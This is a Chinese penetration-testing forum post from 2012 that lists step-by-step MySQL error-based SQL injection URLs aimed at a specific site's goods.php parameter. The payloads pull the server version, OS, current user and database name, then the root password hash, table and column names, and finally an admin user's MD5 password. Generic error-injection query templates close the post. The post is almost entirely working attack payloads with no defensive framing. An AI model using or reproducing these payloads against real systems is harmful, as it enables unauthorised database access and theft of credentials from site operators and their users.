找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2444|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 5 b! _" x7 ]- O& X/ T! _- T/ d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; v2 w& l3 U( ^$ L- k6 R0 n5 N
) [. P5 K2 a+ M( Q9 D判断系统
/ \9 k0 o; p8 {# `% `9 B1 J* k3 T1 `$ u2 V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! F; C  r$ N0 C2 W$ ^6 |7 F
7 B! U( t( T2 c  i! H5 b& o- Z0 ?" ^' G/ `! U
6 F+ _/ e" z( q$ k7 C/ K' b  R
当前 user()
+ d! H$ U1 v: H# p% J3 U5 u7 K# Z9 ~' y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  e" e9 G: W3 o* A& ]

! z; Y: T2 {  i: Y8 y, L1 l2 C. P8 r
( p- J) @( `2 _3 G4 _% Z9 X5 S4 X
当前 database()/ l5 t6 t( Z/ H0 x& x
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 K% }( o+ O1 E

2 P, ]- H7 k9 V- y
! m4 }; a  C- b# l3 R' u. v# E: Q7 P# J% h4 v( R3 k3 _" Y
: O, P1 B" _1 ^# D
root hash
/ u- T, w& K" f
3 C2 k, ?+ u% g( x; c# Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ y; `& V# S* v# e* D, }; [

( ~) Y& f7 ^2 `. r7 O9 n
$ @% _. s4 T7 Y  z- s  Z  K' U( r4 \/ l4 _' N* _8 f
当前 数据库表名
5 F0 I' ^. ^+ q0 G: ]: t- O2 W+ c3 P$ H+ a6 o" P) R. q
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' g) H# T, N7 M# G
; Y( v8 w1 n! [
6 |9 a! E7 R. H( a, T9 Z

! d4 w1 P7 z! p6 \! C9 p! E当前 数据库 user_name 字段! o& C1 ^% d( x3 O2 z8 T( i

# A8 j& }7 X+ R7 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 f- d' J3 c8 v6 e/ |1 K) n5 m
  c2 ~; L: f1 ^1 L/ J当前 数据库 字段 password5 \; k  C3 l4 s- e
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& J/ i6 E6 b! \4 s* P

% ~5 j% Y* U5 o% x, Y$ r, K
( |/ J: _6 f3 d: ~/ f% X
+ e% Y/ g& |+ I7 ^  L) |& c获得 admin passwd(md5)
% ~8 w; ]1 ~! C2 F- I7 Z) ]" t8 T9 P! L

8 T. t. f1 @" R3 w$ K% J2 E0 A8 xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: T: E% t7 p2 e1 O4 W5 X
5 N* K9 }5 E8 j' S5 ^2 ^2 @) q7 ]
报错注射
% N3 a0 r, [, X0 V- |, }  iSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
3 E' |7 I. u5 Z% Y3 Q
) N: C+ y- u7 [* B. m) _SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
+ k( V; e+ u7 v0 x! w/ I. ^0 k# x" m4 D  _7 ~8 f* k
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表